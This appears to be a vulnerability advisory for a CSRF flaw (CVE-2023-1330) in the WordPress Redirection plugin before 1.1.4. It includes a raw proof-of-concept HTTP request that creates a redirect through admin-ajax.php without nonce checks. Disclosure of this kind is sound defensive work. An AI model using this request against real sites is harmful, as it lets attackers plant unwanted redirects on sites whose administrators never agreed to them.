Lucene search
Mohamed SelimWPEX-ID:DE4CFF6D-0030-40E6-8221-FEF56E12B4DEHistoryMar 10, 2023 - 12:00 a.m.
Redirection < 1.1.4 - Redirect Creation via CSRF
2023-03-1000:00:00
Mohamed Selim
199
redirection vulnerability
csrf
sawcup.s2-tastewp.com
EPSS
0.001
Percentile
33.2%
The plugin does not add nonce verification in place when adding the redirect, which could allow attackers to add redirects via a CSRF attack.
````
POST /wp-admin/admin-ajax.php HTTP/2
Host: sawcup.s2-tastewp.com
Cookie: test=test;
User-Agent: useragent
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://sawcup.s2-tastewp.com/wp-admin/admin.php?page=irrp-redirection
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: https://sawcup.s2-tastewp.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
action=irAddRedirect&id=0&from=https%3a%2f%2fsawcup.s2-tastewp.com%2ftest&to=https%3a%2f%2fexample.com%2f&selected=&redirectionType=redirection
````Related
cvelist
cvelist
CVE-2023-1330 Redirection < 1.1.4 - Redirect Creation via CSRF
2023-04-03 14:38:27
wpvulndb
wpvulndb
Redirection < 1.1.4 - Redirect Creation via CSRF
2023-03-10 00:00:00
prion
prion
Cross site request forgery (csrf)
2023-04-03 15:15:00
nvd
nvd
CVE-2023-1330
2023-04-03 15:15:19
cve
cve
CVE-2023-1330
2023-04-03 15:15:19